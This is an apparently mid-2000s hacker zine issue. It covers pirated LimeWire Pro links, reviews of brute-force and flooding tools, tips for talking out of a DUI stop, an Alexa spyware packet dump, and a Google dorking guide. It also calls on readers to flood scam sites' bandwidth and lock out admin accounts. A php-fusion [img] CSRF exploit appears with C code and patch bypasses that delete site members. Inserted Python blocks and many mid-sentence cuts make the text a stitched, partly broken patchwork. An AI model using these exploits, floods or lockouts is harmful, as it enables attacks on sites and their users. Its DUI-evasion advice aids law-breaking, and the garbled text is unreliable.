issue 04
in this issue:
department of corrections
limewire pro 4 all
reviews
getting out of duis
links
webcam directory update
alexa spyware+project info
google mining guide
antidote update
php-fusion exploit
robot files with access diver
bellsouth doc droppage
webcam update
spread lynn-cisco project
the realist's manifesto
mail.b0x
=================
= corrections =
=================
current members:
7j-7193-5396
curls-guided
7h-jxfd-x469
trails-gallop
7j-6404-1115
flies-pour
3h-jxpl-p552
spins-cube
7j-6774-1063
monied-visas
0h-jx4y-g424
cool-play
7j-6774-1069
phoned-ward
9h-jx6v-u522
desert-petite
7j-6774-1060
lyes-vernal
5h-jx6k-3017
border-anchor
7j-6774-1069
phoned-ward
9h-jx6v-u522
desert-petite
7j-6354-6766
field-capper
2h-jxkc-h695
pink-level
7j-7854-2215
hawked-polers
0h-jx7f-v517
puzzle-venus
directory snooping on limewire, found the latest pro downloads for the following operating systems: windows, mac osx, mac
of course you should buy a copy and not just download it without paying! this is just to show you what you can get from
filenames:
windows: limewirewin.exe
mac osx: limewireosx.dmg
mac classic (frozen at 4.0): limewiremac.bin
linux (rpm): limewirelinux.rpm
other (os/2, solaris, linux): limewireother.zip
mirrors:
http://sales.limewire.com/041225/fkzbpt8eru3r2jrmge1hr7adqr3bkzk3/
http://sales.limewire.com/041225/fkzbpt8eru3r2jrmge1hr7adqr3bkzk3/beta/
isn't directory snooping fun? well, as we said you should buy a copy not just download it! we are in no way responsible if
===============
= reviews =
===============
access diver [accessdiver.com] 5/5
this is an awesome cracking tool. it has automated site scans, http brute forcing, form bruting, word list editor, word list duplicate remover, proxy leecher, proxy scanner, proxy analyzer, and many other awesome tools. i would highly recommend this software for anybody looking for some good cracking software. it is free software which is a big plus in my book.
some. it automatically filters out virtual addresses and can change it based on which company you want to make it look like made it.
"1net corporation ;003070
2wire, inc ;000d72
2wire, inc. ;00d09e
360 systems ;000556
360sun digital broadband corporation ;000e60
"
the config file is absolutely huge because of all the mac addresses. this is really nice software and it gets the job done.
all the crap adobe throws on your system so i found this one. it is nice scumware free software and will even set itself as
features:
.httaccess brute forcer
anonymous ftp scanner
bios master passwords
cd player
cgi vuln. scanner
country codes (.de etc)
dictionary generator
dns and reverse dns lookup
domain scanner (portscanner)
file compare
ftp brute forcer
get server services
get cached passwords
hex/dec/bin/ascii converter
html grabber
irc brute forcer
irc flooder
link-looker
netbios password cracker
secure password generator
ping/traceroute
port2service [what services use which port]
portflooder
portscanner
local port checker
port watcher
screensaver cracker
simple mail (can use to mailbomb with anonymous mail servers)
oob nuker
telnet brute forcer
whois info
========================
= getting out of duis =
==by: sheepbyte=========
duis can be a tough battle to fight. if you are guilty and it didn't happen as an accident do not use these techniques. you should go straight to jail. that being said, the tests for drunk driving can be very inaccurate and as a result may get you in for something you haven't done. if you get pulled over make sure you have your papers and all your information in the glove compartment and you know where they are. if you look like you know what you are doing then you will look less drunk and you may avoid a test. the officer will probably ask if you have had anything to drink. there are several paths you could take here. outright saying no will raise a red flag because you probably weren't driving well in the first place. you may choose to say you had some to drink with your friends, but you thought you had less than the legal limit. remember: don't be defensive, be courteous. you could say that you think you may have had too much to drink and that you are tired. casually mention that you think it would be best if you didn't drive anymore and the officer may offer you a ride home. you may even request a safe ride, and most officers won't deny you a ride if you say you shouldn't be on the road because it makes them liable. if he does then take this option!!!!! this will get you home and off clean. don't be afraid to ride with the officer as this won't hurt you. if he arrests you, you are in a whole other league and i won't cover that. some people think drinking listerine will work and in some cases it does. this only works in some states. in many states this will only get the officer mad that you are trying to lie to him and he will do everything to get you in trouble. at some point during the questioning he will ask you if you have any weapons. if you have weapons tell him so. lying about this can land you some time in jail.
remember these tips:
1. look organized
2. don't lie about weapons
3. don't be defensive
4. be courteous and respectful
5. if he offers, take the ride home.
many people get caught in the dui dragnet and hopefully this will help you. again, if you are driving drunk and were being stupid or had it happen before then go to jail and learn your lesson.
===============
= links =
===============
[reverse-engineering.net]
this site has some good resources and a cool forum.
[reteam.org]
this is a good reverse engineering site with some nice forums. it's l337 so go!
[pandora-security.com]
an awesome site i found out about through irc. this is true hacking, none of this cracking or botnet shit. run by my good friend 34109!
[bash.org]
funny stuff from irc. vote for your favorite.
[phrack.org]
phrack 63 is out so download it and read it.
[http://thedigitalremix.com/remixradio/]
a new hacker radio show that i've been watching. looks like it will be pretty cool. i got interviewed so it should be uber-leet.
[shellcoders.com]
a site about programming and hacking by my friend sintigan. anybody who is registered is uber-leet so check it out.
[http://www.2600.com/photos/]
was coley trying to start an image gallery?
===============
= webcam =
= directory =
===============
we are closing down the webcam directory. it looks as if nobody is contributing so there is no reason to keep it up. we may re-launch it at a later time.
===============
= alexa =
= + =
= spyice =
===============
we are starting a new project at the antidote which will be a new approach to spyware. instead of simply defending users
this goes to what appears to be the page ranker. i'm not sure quite how it works but here is part of the packet dump. any areas covered with xs may be private or revealing information.
if you can't tell i was using ie6 infected with alexa toolbar 7.0. this has to be the first time i have deliberately installed such scum on my machine.
another cookie:
0000 00 09 5b 85 81 34 00 c0 fe 01 01 01 08 00 45 00 ..[..4........e.
0010 01 d9 76 96 40 00 80 06 f3 ef c0 a8 00 1c 41 36 ..v.@.........a6
0020 8c 9e 13 28 00 50 67 b1 8d 9d 53 be 41 e8 50 18 ...(.pg...s.a.p.
0030 42 30 0d 09 00 00 47 45 54 20 2f 63 2e 67 69 66 b0....get /c.gif
0040 3f 6e 61 3d 31 31 35 34 26 6e 63 3d 31 30 30 30 ?na=1154&nc=1000
0050 39 26 64 69 3d 33 34 30 26 70 69 3d 37 33 31 37 xxxxxxxxxxxxxxxx
0060 26 50 53 3d 38 33 39 36 37 26 54 50 3d 68 74 74 xxxxxguidxxxxxxx
0070 70 25 33 61 25 32 66 25 32 66 77 77 77 2e 6d 73 xxxxxxxxxxxxxxxx
0080 6e 2e 63 6f 6d 25 32 66 64 65 66 61 75 6c 74 2e n.com%2fdefault.
0090 61 72 6d 78 20 48 54 54 50 2f 31 2e 31 0d 0a 41 armx http/1.1..a
00a0 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 52 65 66 65 ccept: */*..refe
00b0 72 65 72 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e rer: http://www.
00c0 6d 73 6e 2e 63 6f 6d 2f 0d 0a 41 63 63 65 70 74 msn.com/..accept
00d0 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 75 73 -language: en-us
00e0 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e ..accept-encodin
00f0 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 g: gzip, deflate
0100 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f ..user-agent: mo
0110 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 zilla/4.0 (compa
0120 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b tible; msie 6.0;
0130 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b windows nt 5.1;
0140 20 2e 4e 45 54 20 43 4c 52 20 31 2e 31 2e 34 33 .net clr 1.1.43
0150 32 32 3b 20 41 6c 65 78 61 20 54 6f 6f 6c 62 61 22; alexa toolba
0160 72 29 0d 0a 48 6f 73 74 3a 20 63 2e 6d 73 6e 2e r)..host: c.msn.
0170 63 6f 6d 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a com..connection:
0180 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f keep-alive..coo
0190 6b 69 65 3a 20 43 55 4c 54 55 52 45 3d 65 6e 2d kie: culture=en-
01a0 55 53 3b 20 6d 68 3d 4d 53 46 54 3b 20 4d 43 31 us; mh=msft; mc1
01b0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx =v=2&guid=xxxxxx
01c0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxguidxxxxxxxxxx
01d0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxx; spee
01e0 44 3d 42 0d 0a 0d 0a d=b....
url request:
0000 00 09 5b 85 81 34 00 c0 fe 01 01 01 08 00 45 00 ..[..4........e.
0010 01 d9 76 96 40 00 80 06 f3 ef c0 a8 00 1c 41 36 ..v.@.........a6
0020 8c 9e 13 28 00 50 67 b1 8d 9d 53 be 41 e8 50 18 ...(.pg...s.a.p.
0030 42 30 0d 09 00 00 47 45 54 20 2f 63 2e 67 69 66 b0....get /c.gif
0040 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0050 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0060 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0070 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0080 6e 2e 63 6f 6d 25 32 66 64 65 66 61 75 6c 74 2e n.com%2fdefault.
0090 61 72 6d 78 20 48 54 54 50 2f 31 2e 31 0d 0a 41 armx http/1.1..a
00a0 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 52 65 66 65 ccept: */*..refe
00b0 72 65 72 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e rer: http://www.
00c0 6d 73 6e 2e 63 6f 6d 2f 0d 0a 41 63 63 65 70 74 msn.com/..accept
00d0 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 75 73 -language: en-us
00e0 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e ..accept-encodin
00f0 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 g: gzip, deflate
0100 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f ..user-agent: mo
0110 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 zilla/4.0 (compa
0120 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b tible; msie 6.0;
0130 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b windows nt 5.1;
0140 20 2e 4e 45 54 20 43 4c 52 20 31 2e 31 2e 34 33 .net clr 1.1.43
0150 32 32 3b 20 41 6c 65 78 61 20 54 6f 6f 6c 62 61 22; alexa toolba
0160 72 29 0d 0a 48 6f 73 74 3a 20 63 2e 6d 73 6e 2e r)..host: c.msn.
0170 63 6f 6d 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a com..connection:
0180 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f keep-alive..coo
0190 6b 69 65 3a 20 43 55 4c 54 55 52 45 3d 65 6e 2d kie: culture=en-
01a0 55 53 3b 20 6d 68 3d 4d 53 46 54 3b 20 4d 43 31 us; mh=msft; mc1
01b0 3d 56 3d 32 26 47 55 49 44 3d 62 61 66 30 34 63 =v=2&guid=x
01c0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
01d0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
01e0 44 3d 42 0d 0a 0d 0a d=b....
here are the changes it made to my system during the install. again xxxxxs indicate bleeped out information. i tracked this information with total-uninstall 3.0, which is really great software. i'm not including things like temp files and modifications to system logs in this. a clsid is the equivalent of a guid.
it looks like they use web bugs to track users and things like
.gif?guid=xxxxx&requestip=xxxx
and it goes on like that. i was unable to decode the tcp packets. it detected my brand of computer and told alexa what it was. this software is very scary and bonzi/gator can only be worse. a lesson here can be learned that you need to be careful with what you download, run, and let slip through your network.
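reading the tracking fields out of a dump like the ones above by hand is error-prone, so here is an added example (mine, not the zine's) that parses that offset/hex/ascii layout back into bytes, skips the x'd-out lines, strips the ethernet/ip/tcp headers and pulls the guid-style identifiers out of the query string and the cookie. the sample frame is constructed (link/ip/tcp header bytes copied from the dump above, an obviously fake guid), not a capture:

```python
import re
from typing import Dict, List, Tuple

# One dump line: 4-digit hex offset, 1..16 space-separated hex bytes, then an
# ASCII column.  Lines whose bytes were replaced with x's do not match and are
# skipped.  (A partial last line whose ASCII column happened to start with two
# hex digits and a space would be over-read; the dumps above do not.)
HEX_LINE = re.compile(r"^([0-9a-fA-F]{4})\s+((?:[0-9a-fA-F]{2}\s+){1,16})")


def parse_hexdump(dump: str) -> bytes:
    """Rebuild the raw frame; gaps left by redacted lines are zero-filled."""
    frame = bytearray()
    for line in dump.splitlines():
        m = HEX_LINE.match(line.strip())
        if not m:
            continue
        offset = int(m.group(1), 16)
        data = bytes.fromhex(m.group(2))
        if offset > len(frame):
            frame.extend(b"\x00" * (offset - len(frame)))
        frame[offset:offset + len(data)] = data
    return bytes(frame)


def http_request_from_frame(frame: bytes) -> Dict[str, object]:
    """Skip Ethernet (14), IPv4 (IHL*4) and TCP (data offset*4) headers and
    parse the HTTP request line and headers.  Nothing else is validated."""
    ihl = (frame[14] & 0x0F) * 4
    tcp = 14 + ihl
    data_off = (frame[tcp + 12] >> 4) * 4
    head = frame[tcp + data_off:].decode("latin-1").split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for raw in lines[1:]:
        name, _, value = raw.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def _kv_pairs(s: str, sep: str) -> List[Tuple[str, str]]:
    pairs = []
    for item in s.split(sep):
        if "=" in item:
            k, _, v = item.partition("=")
            pairs.append((k.strip(), v.strip()))
    return pairs


def tracking_identifiers(req: Dict[str, object]) -> Dict[str, object]:
    """The web-bug parts: any GUID in the query string or nested inside a
    cookie value (MC1=V=2&GUID=... packs its own k=v list into one cookie),
    plus whether the User-Agent announces the toolbar."""
    headers = req["headers"]
    guids: Dict[str, str] = {}
    for k, v in _kv_pairs(req["target"].partition("?")[2], "&"):
        if k.lower() == "guid":
            guids["query:" + k] = v
    for ck, cv in _kv_pairs(headers.get("cookie", ""), ";"):
        for k, v in _kv_pairs(cv, "&"):
            if k.lower() == "guid":
                guids[f"cookie:{ck}.{k}"] = v
    return {
        "host": headers.get("host", ""),
        "guids": guids,
        "toolbar_in_user_agent": "alexa toolbar" in headers.get("user-agent", "").lower(),
    }


def to_hexdump(data: bytes) -> str:
    """Render bytes in the same offset/hex/ascii layout as the dumps above."""
    out = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        out.append(f"{off:04x} {hexpart} {asc}")
    return "\n".join(out)


def constructed_frame() -> bytes:
    """Constructed sample, not a capture: the link/IP/TCP header bytes from the
    dump above (192.168.0.28 -> 65.54.140.158, TCP data offset 5) followed by a
    request of the same shape carrying an obviously fake GUID."""
    eth = bytes.fromhex("00095b858134 00c0fe010101 0800")
    ip = bytes.fromhex("4500 01d9 7696 4000 8006 f3ef c0a8001c 41368c9e")
    tcp = bytes.fromhex("1328 0050 67b18d9d 53be41e8 5018 4230 0d09 0000")
    http = (
        "GET /c.gif?na=1154&nc=10009&di=340&pi=7317 HTTP/1.1\r\n"
        "Accept: */*\r\n"
        "Referer: http://www.msn.com/\r\n"
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; "
        ".NET CLR 1.1.4322; Alexa Toolbar)\r\n"
        "Host: c.msn.com\r\n"
        "Cookie: CULTURE=en-US; mh=MSFT; MC1=V=2&GUID=CONSTRUCTED0000; SPEED=B\r\n"
        "\r\n"
    ).encode("ascii")
    return eth + ip + tcp + http


SAMPLE_DUMP = to_hexdump(constructed_frame())


def analyze(dump: str) -> Dict[str, object]:
    return tracking_identifiers(http_request_from_frame(parse_hexdump(dump)))


if __name__ == "__main__":
    print(SAMPLE_DUMP)
    print(analyze(SAMPLE_DUMP))
```

the redacted lines are the reason the parser keeps offsets honest instead of just concatenating: a skipped x'd line would otherwise shift every later byte and the header decode would land in the wrong place. on a real dump with the x's present, the analysis still works as long as the request line and the cookie header survive in the clear.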
anybody who knows anything about spyware or can code and would be willing to participate please contact us. we need inside sources to tell us what all this means!! basically we will be using their techniques against them. we will spam the spyware databases with either random data, data with a message, or realistic-looking bullshit. we haven't decided quite how this project will end up, so we are still planning. the ~blindnet~ project will be on hold until we get this off to a good start. we might start a sourceforge project for this. it will probably be in c or a c variant and will run on win32/*nix systems. the information we find out will all be available online on a website containing information about these *evil* companies in a somewhat open format (almost a wiki). again, if you would like to help please drop an email to:
sheepbyte@gmail.com
================
= the =
= google =
= mining =
= guide =
= by: =
= sheepbyte =
= i'm @ gmail! =
================
what is google mining
commands
exploitation
resources
problems with it
corporate responsibility
conclusion
commands
---------
""
intitle:
inurl:
intext:
insite:
cache:
link:
related:
info:
definition:
stocks:
filetype:
movie:
fcc
patent
""
quotes can help you specify blocks of text. let's say i'm ego-googling on my zine. i would type "the intrahack zine" and get results only pertaining to it. if i typed in the intrahack zine i would get pages containing these combinations of words:
the
intrahack
zine
the intrahack
the zine
intrahack zine
that isn't very efficient is it? let's say i'm looking for manuals for the glass front vendor by dixie-narco. i could use this query:
"dixie-narco" "glass front" "manual"
if you go under advanced mode you can make sure all those terms are in the page.
intitle:
the intitle command ensures that something is in the title. let's say you are looking for a copy of freedom downtime. you could type:
intitle:"index of /" "freedom" "downtime" ".avi"
this is a fairly insufficient search but we will get into more complicated commands.
the key part to the above search is the intitle:"index of /" which makes sure the file is in an open ftp directory. some sites will spoof this, but generally you will get good results. if you want to look for a page with
inurl:
the inurl: function allows you to specify part of the url. let's say you are looking for "hitch" torrents. you could find blog torrent servers using this query:
inurl:/bt "hitch" "torrent"
you may not wish to add "torrent" because it will give you more hits. let's say you want to find open directories on .mil sites. just use:
inurl:".mil" intitle:"index of /"
allinurl: can use multiple words.
intext:
the intext: function is pretty useless. you can already just type it in the search box or use quotes to achieve the same results. if you type "free porn" in google you will get sites that may only contain that in the title or meta tags; intext: ensures it is in the text.
insite:
the insite command can be used to search a certain site. now this is fairly useless because you already have the same command as insite: called inurl:. let's say you are searching binrev forums for a post about catsex. you could use this query:
insite:binrev.com "catsex"
you could also use the inurl: function to achieve the same results. inurl: will turn up hits from archive.org and other mirrors so insite: does a little better at this. site: will also achieve the same effect.
cache:
you can use the cache: command to find google's cache of a site. at one point tiz.brokenfloppy.com had no bandwidth left so you could have used
cache:tiz.brokenfloppy.com
to see it. many pdf files and other files are available only through cache and other archive services. i believe you can send a request to google to remove your site but i think you have to find the email.
link:
this query will return all pages that link to a certain page. let's say i'm looking for pages that link to
related:
this query returns pages that are related to other pages. related:bellsmind.net turns up several good results.
info:
this returns info about a certain page or site. info:binrev.com returns some of the news from the site. this can also be
definition:
this will give you the definition of a word. pretty self-explanatory. you can also use define:.
stocks:
this will return stock information. if you want to see multiple stocks such as microsoft and aol type stocks:msft aol
filetype:
the filetype: function will only return files of a certain type. let's say you are looking for manuals in the pdf format.
movie:
use the movie: function to find information out about a movie.
fcc
use "fcc fccid" to find fcc information on a specific device.
patent
use "patent patentnum" to find patent information.
you can also do math queries. type 5+2 and google will tell you the answer is 7.
you can also do currency conversions in this format: 3.5 usd in gbp
exploitation
------------
many exploits for web applications come out every day. google enables skiddies to do mass site defacements. let's say there is an exploit for php-nuke. what you can do is go in to google and type something all the pages run by that system have in common. most cmss have a little "created by" thing at the bottom or something similar to it, so it is easy to identify sites. once you have searched you just rip all the urls and run them through a perl script to make the exploit urls. exploitation and defacement is suddenly a breeze. it really takes no skill to deface websites with cms exploits and that is why so many people do it. they do it to impress their friends, to feel good about themselves, or to please their ego. if you are doing mass defacements you don't deserve to be part of the internet.
resources
---------
there are many places with information on google mining/hacking. for specific queries check out johnny.ihackstuff.com
for google mining questions contact me or go to binrev.com/forums to the google mining section. there is a lot more to be learned in this area. i haven't included specific queries because it would take thousands of pages and would just be worthless filler. there are some books out there on google mining and most forums will have members willing to help. google
problems with it
----------------
the only problems with google mining that restrain you from everything are robots.txt files and linking. google obeys robots.txt files which could seriously hamper your results on specific sites. if a page doesn't link to a page you are looking for, google won't find it. programs like winhttrack will even look in source to find pages, so for site-specific
corporate responsibility
-------------------------
where does personal responsibility end and corporate responsibility start? many people say google shouldn't allow users to search for exploited pages. there are several problems with this proposal. first off, it would only become a race between google and the exploiters. google is no more capable of blocking exploits than people are of finding and using them. there is a system in place called the robots.txt file to help you if you are a super-paranoid admin. there was an article in the most recent 2600
can help you achieve just that. this article does not cover all of google's features, it only covers ones that can go in the search box. using services to find things has always been a skill a hacker needs and google is just another service like many others before us. from using the list command in irc to the inurl: command in google, information is always the goal. if you
===============
= antidote =
= update =
===============
please welcome anonymous, anonymous, anonymous, anonymous, anonymous, anonymous, anonymous, anonymous, and anonymous to the antidote!
we apologize for not revealing member names but as you know, this is sensitive business.
check out our new site at:
antidote.kazasena.com
if you are a member of the lad wrecking crew or you know how to get in contact with them please contact us!
we had a member join by the name of phatal. he hangs out on irc at irc.undergroundnews.com
beware! phatal is a fed! shortly after he joined one of our members couldn't remember us or what we had done, he left, and never came back. in other words, arrested.
i would advise everybody to stay away from him. we had lots of weird activity since his joining. stay away. stay safe.
there has been lots going on in the antidote labs. we have our own members only irc channel now. there are several project updates you should hear. the ~blindnet project is being discontinued until further notice; however, we will finish it. the spyice project is still very active as well as the anti-phishing project phishice. we have sent tons of victim and scammer information to the authorities.
if you would like to contribute to the project please load the current super-leech page against mega-buck.com, a fake lottery site. we are now doing penetration testing on a server near you! organizations, people we like, and special requests may get a free or discounted rate. the standard rate for a test is 100 u.s. if we don't find any vulnerabilities you pay n-o-t-h-i-n-g! email sheepbyte@gmail.com for more information or catch him at the tiz irc channel.
we leeched all the bandwidth from mega-buck.com. another fake lottery bites the dust.
you can log in to these admin accounts with bad passwords to lock them out:
administration
render
you can lock out the members also. there is a memberlist here:
http://antidote.kazasena.com/memberlist.txt
the aa419.org flashmob is occurring or is already done by the time you read this but we still need your help!
you can reload these fake banks pages. the targets are:
http://www.nationalfingroup.com/
http://www.alliancedcourier.com/
http://www.westernoceanic.com/
http://www.westminsterexpress.com/
http://www.co-baci.com/
http://www.ltbancorp.com/
http://www.reliancetrustbank.com/
http://www.fcbankuk.com/
http://www.cbonline-international.com/
http://www.tigon-line.com/
http://www.transatlanticinvest.org/
http://www.weststarexpress.com/
http://www.business.gfams.com/
http://www.ntbonline-cayman.com/
you can call the people who run these fake banks!!!
phone numbers:
+27 72-051-6240
+27 724156675
+34 686072781
+32 484 67 50 53
+31 646472805
+33 142748596
+44 709 203 4931
+44 (0) 845 686 0608
+44 1624 672211
+44 2084712109
+1 866-549-1347
+1 866-566-6285
+1 866-556-6234
+1 416 832-6837
+1 218 554-4756
if you wish to leech from an always updating large list of targets check out the mugu marauder and the lad vampire at aa419.org. while the flashmob is occurring it will only leech from these targets.
for those who are interested in joining the battle against scammers you should check out 419eater.com 419sport.com 419eater.com thescambaiter.com aa419.org and if you are so brave as to, join the antidote by emailing sheepbyte
thanks to everybody who has participated in this flashmob.
/exit
============================
= a new php-fusion exploit =
= found by easyex =
============================
quote:
two security flaws have recently been discovered in the ubb code parsing by two of our users. grindordie found that a user could virtually deface areas of the site that utilise the [color] tags. while this does not cause any harm it can be rather
[img] tags without anyone knowing. as usual i have produced the required fixes. the sourceforge files have been updated, existing users can download the new maincore.php file from the downloads area. updated i've refined the code and updated the files. if you prefer to update the code yourself click read more for instructions.
source: http://www.php-fusion.co.uk/
/*
discovered/coded by easyex
using the [img] [/img] codes we can get an administrator to do a function a normal member cannot do.
for example..
[img]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1[/img]
this could be in our signature, forum post or in a comment post. when an admin views the page with the malicious code it will automatically load and do the function we selected. in the example it would delete the member with the id: 1
because we are using the [img] [/img] code it just shows up as an invalid image.
code usage:
<version> is the php-fusion version. enter 6.x or 5.x depending on the version number.
so if we had a vulnerable host running php fusion v6.00.106 or below with say 150 users and we wanted to delete them all we would type ./fusionimg 6.x / deluser 1 150 or if we wanted to delete 1 user that had the id: 5 we would type: ./fusionimg 6.x / deluser 5 5
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int usage() {
printf("usage: ./fusionimg <version> <dir> <option> <start> <end>\n");
printf("example: ./fusionimg 6.x / deluser 1 500\n");
exit(1);
}

int main(int argc, char *argv[]) {
printf("\n");
printf("php-fusion [img][/img] exploit\n");
printf("coded by easyex from the dark assassins crew\n\n");
if(argc < 6)
usage();
int i;
char cmd[512];
char option[512];
char version[512];
FILE *log;
log = fopen("exploit.txt", "w+");
if(log == 0) {
printf("[-] error opening log file.\n");
exit(-1);
}
if(strcmp(argv[1], "6.x") == 0) {
strncpy(version, "administration/", 512);
}
else {
printf("[-] error, invalid version!\n");
exit(-1);
}
// there are other options you can do, this is just some of them...
// if you need to find out a users id you can just go to members.php and click
// on the user you want and the id will show
if(strcmp(argv[3], "deluser") == 0) {
strncpy(option, "members.php?step=delete&sortby=all&rowstart=0&user_id=", 512);
fprintf(log, "you have selected to delete %s > %s user(s)\n", argv[4], argv[5]);
}
else {
printf("[-] error, invalid option!\n");
exit(-1);
}
fprintf(log, "add the following lines of code into your signature, forum post or in a comment post:\n\n");
/* the rest of main() (the loop over <start>..<end>) is not reproduced in this copy */
old code:
code:
$ubbs1[10] = '#\[img\](.*?)\[/img\]#si';
$ubbs2[10] = '<img src=\'\1\' border=\'0\'>';
code:
code:
$ubbs1[10] = '#\[img\](.*?)(\.(jpg|jpeg|gif|png|jpg|jpeg|gif|png))\[/img\]#si';
$ubbs2[10] = '<img src=\'\1\2\' border=\'0\'>';
code:
[img]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1[/img]
so that was the first example, but now the patch is up we have to bypass that also, we can do this by adding a .jpg extension:
code:
[img]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1&exploit=.jpg[/img]
you can add any image extension that is allowed and the php-fusion <= 6.0 106 bbcode img tag script injection exploit will
to get it to work with the exploit code, if needed modify the following:
code:
to
code:
and it will now create the correct image tags for the people who are running the patch.
php-fusion has made the 2nd update to the ubb code security patch to fix the &exploit=.jpg problem.
still exploitable. let's take a look at the latest ubb code security patch
code:
$ubbs1[10] = "#\[img\]((http|ftp|https|ftps)://)(.*?)(\.(jpg|jpeg|gif|png|jpg|jpeg|gif|png))\[/img\]#sie";
$ubbs2[10] = "'<img src=\'\\1'.str_replace(array('?','&','='),'','\\3').'\\4\'>'";
so now what it does is only allow http:// ftp:// etc in the [img] and it blocks ? & = etc but we can get around this...
we can create a directory on a remote host called 'exploit.jpg' or whatever you like, and then in the directory you would
code:
<?php
header("location:
http://example.com/administration/members.php?step=delete&sortby=all&rowstart=0&us
er_id=1&exploit=.jpg");
exit;
?>
so it thinks it's an image file, but really it isn't and it executes the index.php script and then the exploit works fine again, but this time you have to include the host running php-fusion in that index.php script. then, you go to the host running php-fusion and then again put it in your signature, make a forum post, or comment post
example:
code:
[img]http://theremotehost.com/exploit.jpg[/img]
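to see why each patch in turn got bypassed, here is an added example (not easyex's code and not php-fusion's) that transcribes the three versions of the [img] filter quoted above into python, runs the three payload shapes from this page through them, and then shows the check that actually closes the hole: the admin action in members.php is written as a handler that only acts on a POST carrying a per-session csrf token, since an <img> fetch can never supply one. the handler shape is my assumption, not php-fusion's code, and the regexes assume php's #...#si and python's re.S | re.I agree on these inputs:

```python
import hmac
import re
import secrets
from typing import Dict

# The three [img] filters quoted above, transcribed from the PHP preg_replace
# patterns.  The /e version's str_replace on the path part becomes a callback.
_V1 = re.compile(r"\[img\](.*?)\[/img\]", re.S | re.I)
_V2 = re.compile(r"\[img\](.*?)(\.(jpg|jpeg|gif|png))\[/img\]", re.S | re.I)
_V3 = re.compile(
    r"\[img\]((http|ftp|https|ftps)://)(.*?)(\.(jpg|jpeg|gif|png))\[/img\]", re.S | re.I)


def render_v1(text: str) -> str:
    """original: anything between the tags becomes the <img src>"""
    return _V1.sub(r"<img src='\g<1>' border='0'>", text)


def render_v2(text: str) -> str:
    """first patch: the URL must end in an image extension"""
    return _V2.sub(r"<img src='\g<1>\g<2>' border='0'>", text)


def render_v3(text: str) -> str:
    """second patch: scheme required, and ? & = stripped from the path part"""
    def repl(m: "re.Match[str]") -> str:
        path = m.group(3).replace("?", "").replace("&", "").replace("=", "")
        return f"<img src='{m.group(1)}{path}{m.group(4)}'>"
    return _V3.sub(repl, text)


# The three payload shapes shown on this page, in the order they appeared.
PAYLOADS = {
    "plain": "[img]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1[/img]",
    "jpg_suffix": "[img]/administration/members.php?step=delete&sortby=all&rowstart=0"
                  "&user_id=1&exploit=.jpg[/img]",
    "redirect": "[img]http://theremotehost.com/exploit.jpg[/img]",
}


def filter_outcomes() -> Dict[str, Dict[str, bool]]:
    """For each payload, does each filter version still emit an <img> tag?"""
    return {
        name: {
            "v1": "<img" in render_v1(text),
            "v2": "<img" in render_v2(text),
            "v3": "<img" in render_v3(text),
        }
        for name, text in PAYLOADS.items()
    }


class AdminSession:
    """Stand-in for a logged-in admin: holds a per-session CSRF token."""

    def __init__(self) -> None:
        self.csrf_token = secrets.token_hex(16)


def delete_member(session: AdminSession, method: str, params: Dict[str, str],
                  members: Dict[int, str]) -> str:
    """Hardened shape for the members.php?step=delete handler (assumed, not
    PHP-Fusion's code).  A browser fetching an <img> always sends a GET with
    no form body, so requiring POST plus a token that only the admin's own
    page carries stops every [img] variant above regardless of URL shape."""
    if method != "POST":
        return "refused: state change requires POST"
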